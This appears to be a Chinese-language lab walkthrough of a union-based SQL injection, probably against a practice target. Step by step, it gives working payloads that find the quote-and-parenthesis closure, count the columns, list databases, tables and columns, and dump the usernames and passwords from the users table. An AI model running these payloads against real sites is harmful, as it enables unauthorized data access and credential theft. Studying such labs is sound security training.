1.初始状态:
2.输入?id=1:
3.输入?id=1 and 1=2--+,发现没有报错:
不是数字型注入,假设是字符型注入,首先尝试单引号:
?id=1' and 1=2--+
单引号行不通,试试双引号,发现报错:
?id=1" and 1=2--+
看到黄色字体语句中有语法报错:
按提示修改注入语句:
?id=1") and 1=2--+
4.猜字段数发现从3到4发生变化,判断出字段数为3:
?id=1") order by 3--+
?id=1") order by 4--+
5.修改id值为一个不存在的数,找出显示位:
?id=-1") union select 1,2,3--+
6.分别在2,3号显示位展示当前数据库及所有数据库名字:
?id=-1") union select 1,database(),group_concat(schema_name) from information_schema.schemata--+
7.开始找当前数据库的表:
?id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+
8.找到该数据库中users表中所有列名:
?id=-1") union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+
9.最后一步,找出账号名及密码:
?id=-1") union select 1,group_concat(username),group_concat(password) from users--+